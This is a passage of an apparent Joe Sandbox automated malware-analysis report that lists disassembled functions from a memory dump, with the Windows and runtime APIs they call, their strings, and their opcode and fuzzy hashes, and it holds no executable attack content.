Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$vector<T> too long
API String ID: 1823113695-3369487235
Opcode ID: 719e12062c7557efbe6c91f0dca7973f27cce6ab3e9c9e837a8e93b8470a445c
Instruction ID: 00918cdb279463c977c2482ac2d7cb1756f7ada55561925095b82af27067cbb5
Opcode Fuzzy Hash: 719e12062c7557efbe6c91f0dca7973f27cce6ab3e9c9e837a8e93b8470a445c
Instruction Fuzzy Hash: 7B31B4B1A006099FC718CF59D980E6AF7B9EB48304F64862DE9599B780DB31B9048BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE88E40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(CB65479A,CB65479A), ref: 6CE88E7F
GetLastError.KERNEL32(0000000A), ref: 6CE88E8F

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

__CxxThrowException@8.LIBCMT ref: 6CE88F14

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

Timer: QueryPerformanceFrequency failed with error , xrefs: 6CE88EA5

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
String ID: Timer: QueryPerformanceFrequency failed with error
API String ID: 2175244869-348333943
Opcode ID: d38ade09baef9d3b8b5e6d5ca43d7a374d175c2a890723c785b8693c74de1966
Instruction ID: cc95c3559257af98c7c4cf9b124f0cde83a2daf5cecd278882049b4da71d847b
Opcode Fuzzy Hash: d38ade09baef9d3b8b5e6d5ca43d7a374d175c2a890723c785b8693c74de1966
Instruction Fuzzy Hash: 6C211BB15083809FD310CF64C881B9BB7F8BB89618F504E1EF5A996791DB79D5088BA3

Uniqueness

Uniqueness Score: -1.00%

Function 6CE88F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(CB65479A,CB65479A,?,00000000), ref: 6CE88F7F
GetLastError.KERNEL32(0000000A,?,00000000), ref: 6CE88F8F

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

__CxxThrowException@8.LIBCMT ref: 6CE89014

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

Timer: QueryPerformanceCounter failed with error , xrefs: 6CE88FA5

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
String ID: Timer: QueryPerformanceCounter failed with error
API String ID: 1823523280-4075696077
Opcode ID: 6b4907e8c73226e3268b6ec516bcf1939327db3ce051f4dfa2a768a4a6d9430b
Instruction ID: f7256d636c9e2ae573476250747d0ceab28de87e932d2a9cd4b1c3465fef07c3
Opcode Fuzzy Hash: 6b4907e8c73226e3268b6ec516bcf1939327db3ce051f4dfa2a768a4a6d9430b
Instruction Fuzzy Hash: D6211DB15083809FD310CF64C881B9BB7F4BB89618F504E1EF5A996781DB7595088BA3

Uniqueness

Uniqueness Score: -1.00%

Function 6CE56480 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CE56518

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

__CxxThrowException@8.LIBCMT ref: 6CE56558

Strings

Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6CE564E7
Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6CE56527

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
API String ID: 3476068407-3345525433
Opcode ID: a140b4c59add97fbf8b68d80e6c1070c1448a7cb8bc17088d6725121a87267e0
Instruction ID: 026514c76cf57bcbf19d53e5781967e9df94630d3be9cb942d70643253b8b056
Opcode Fuzzy Hash: a140b4c59add97fbf8b68d80e6c1070c1448a7cb8bc17088d6725121a87267e0
Instruction Fuzzy Hash: E621C3715183809FD724DB64C840BDAB3F8BB4561CFA04E1DE59992B84EB3A95088B63

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5C120 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE5C14E

Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE890ED
Part of subcall function 6CE890D8: __CxxThrowException@8.LIBCMT ref: 6CE89102
Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE89113

Strings

gfff, xrefs: 6CE5C15A
vector<T> too long, xrefs: 6CE5C149
gfff, xrefs: 6CE5C129

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$vector<T> too long
API String ID: 1823113695-3369487235
Opcode ID: 8aa7fef18defd7714cc8d214f214d01f5724bec816f413b9ee507ff008b051f9
Instruction ID: b0dfb31ff753a69c9722bb3641143556ddcc1b4814f82d77e33ecff86fd71373
Opcode Fuzzy Hash: 8aa7fef18defd7714cc8d214f214d01f5724bec816f413b9ee507ff008b051f9
Instruction Fuzzy Hash: E301D673F140291F8311993FFE40449E6A797C8394369CA3AE508DF748D532D85257C2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE35160 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE35173

Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE890ED
Part of subcall function 6CE890D8: __CxxThrowException@8.LIBCMT ref: 6CE89102
Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE89113

_memmove.LIBCMT ref: 6CE3519E

Strings

n/l, xrefs: 6CE35163, 6CE351BD
vector<T> too long, xrefs: 6CE3516E

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: n/l$vector<T> too long
API String ID: 1785806476-2200402934
Opcode ID: 806c4bd422ee64c7c41b411d0232ddb2fda1daeadefbbb8fb5ca1f113b9836ec
Instruction ID: 021d2402b1750493ec4ad222eb4ae21a8d70a62b8a732b7a1e13158febe2b403
Opcode Fuzzy Hash: 806c4bd422ee64c7c41b411d0232ddb2fda1daeadefbbb8fb5ca1f113b9836ec
Instruction Fuzzy Hash: 43018FB26012059FD728CEA8CC9186AB3F8EB542487244A2DE89FD3B40E731F804CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6CE45900 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE45932
__CxxThrowException@8.LIBCMT ref: 6CE45947

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

Strings

0Bl, xrefs: 6CE4593C, 6CE45928, 6CE4593F
0Bl, xrefs: 6CE45940

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl$0Bl
API String ID: 4063778783-1774228455
Opcode ID: 2c145c73f9a15a08a2e181a786c0dbbfda1a7b6c605df599c93e588e0d5f1c8c
Instruction ID: 17262aaf70a4dce9f045f7c067f5304007545b23d3f9b9998dea50725647a7a1
Opcode Fuzzy Hash: 2c145c73f9a15a08a2e181a786c0dbbfda1a7b6c605df599c93e588e0d5f1c8c
Instruction Fuzzy Hash: 43E09B7181610956EB08DBE5AD116FFB2789F0122CF70076DDA2952B80EF70D6088665

Uniqueness

Uniqueness Score: -1.00%

Function 6CE331E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE33216
__CxxThrowException@8.LIBCMT ref: 6CE3322B

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

Strings

0Bl, xrefs: 6CE33224
0Bl, xrefs: 6CE3320C, 6CE33220, 6CE33223

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl$0Bl
API String ID: 4063778783-1774228455
Opcode ID: 009452a6ffc317b971be0ae9aacad885b2b6ac18dc640505a8b9398d04f712bb
Instruction ID: 7810841c36774a00f54aef50bd4c3c722f678e3b6c1bfd6786d6185c133da0f6
Opcode Fuzzy Hash: 009452a6ffc317b971be0ae9aacad885b2b6ac18dc640505a8b9398d04f712bb
Instruction Fuzzy Hash: 62E0657181121956DB04EBE49D11BFFB3789F0531DF600A5DD82953A90FB70A209C5B5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE625D0 Relevance: 6.2, APIs: 4, Instructions: 206COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6CE62677
_memmove.LIBCMT ref: 6CE626E6
_memmove.LIBCMT ref: 6CE62746
__CxxThrowException@8.LIBCMT ref: 6CE627CD

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _memmove$Exception@8Throw
String ID:
API String ID: 2655171816-0
Opcode ID: e0c78f762e39b3d9a599f8d861b091d69a79ff2e6253ccd1a1fff4da21ba6201
Instruction ID: b9d3dc5448be377f0871066c204b15e6ea936eb084d947f40d929d41dd7c547c
Opcode Fuzzy Hash: e0c78f762e39b3d9a599f8d861b091d69a79ff2e6253ccd1a1fff4da21ba6201
Instruction Fuzzy Hash: 0951A0753597058FD704DF6AC984A2EB7F9AFD8708F20492CE495C3B40EB34E9098B92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3DE50 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CE3DE81
VariantClear.OLEAUT32(?), ref: 6CE3DF3C
VariantClear.OLEAUT32(?), ref: 6CE3DF6D
VariantClear.OLEAUT32(?), ref: 6CE3DF8B

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$Clear$Init
String ID:
API String ID: 3740757921-0
Opcode ID: 976ecb99eadc21a2dc97acc4687b6a86b12b8fcd68e7fa56b85d842b7d44bf54
Instruction ID: 189f4385da380ec2a6cb0a88ed73238effc0440dd0c4a7201feec460439aa9b0
Opcode Fuzzy Hash: 976ecb99eadc21a2dc97acc4687b6a86b12b8fcd68e7fa56b85d842b7d44bf54
Instruction Fuzzy Hash: 1A41AC366082019FD700DF6AC880A5AB7F8FF99714F244A6EF958DB790D731E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4B580 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6CEA02A0), ref: 6CE4B5D5
VariantInit.OLEAUT32(?), ref: 6CE4B5E2
VariantClear.OLEAUT32(?), ref: 6CE4B685
VariantClear.OLEAUT32(6CEA02A0), ref: 6CE4B68B

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 8a5b8267a01f021f4b3d77306548eb7521a6c6273acd3332501df08c02e7f771
Instruction ID: 239d227363663869a32e28b6aea14b0ae452b5cb37febc0199e80547fdae65b2
Opcode Fuzzy Hash: 8a5b8267a01f021f4b3d77306548eb7521a6c6273acd3332501df08c02e7f771
Instruction Fuzzy Hash: C8419272A012099FDB00DFA9D980B9EF7F9EF89314F248199E90597350D735E901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE988C9 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6CE988FD
__isleadbyte_l.LIBCMT ref: 6CE98930
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 6CE98961
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 6CE989CF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 9137fad0204e256ba1af8c0d41e5cd75ecfb2af98afd7632575e7f20400b8cc3
Instruction ID: 7c0b1563bc47fb81d6ed6341db2f7a5b61d26427e09d40e0fd01dfbe914118ed
Opcode Fuzzy Hash: 9137fad0204e256ba1af8c0d41e5cd75ecfb2af98afd7632575e7f20400b8cc3
Instruction Fuzzy Hash: 3731FA31A05346EFDB20CFA8C8809AD3BB4BF02318F74456EE0689B6B0D731D980DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE92645 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CE92653

Part of subcall function 6CE89D66: __FF_MSGBANNER.LIBCMT ref: 6CE89D7F
Part of subcall function 6CE89D66: __NMSG_WRITE.LIBCMT ref: 6CE89D86
Part of subcall function 6CE89D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CE89BD4,6CE21290,CB65479A), ref: 6CE89DAB

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 4a3a48c23a5c12df662fca0e5295417651f7e14389941976a73312b0c68c7c84
Instruction ID: 0fd97bec8d5bb43958bc55578d334a7959fe9b60415efdebf21288f66446a201
Opcode Fuzzy Hash: 4a3a48c23a5c12df662fca0e5295417651f7e14389941976a73312b0c68c7c84
Instruction Fuzzy Hash: 2F11C4326463156BCF112E75B808A8D37B8AB53379F34012EE95896F82DF35C9418794

Uniqueness

Uniqueness Score: -1.00%

Function 6CE37240 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 6CE54410: _malloc.LIBCMT ref: 6CE5446E

SafeArrayCreateVector.OLEAUT32(00000011,00000000,?), ref: 6CE37287
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CE3729B
_memmove.LIBCMT ref: 6CE372AF
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CE372B8

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
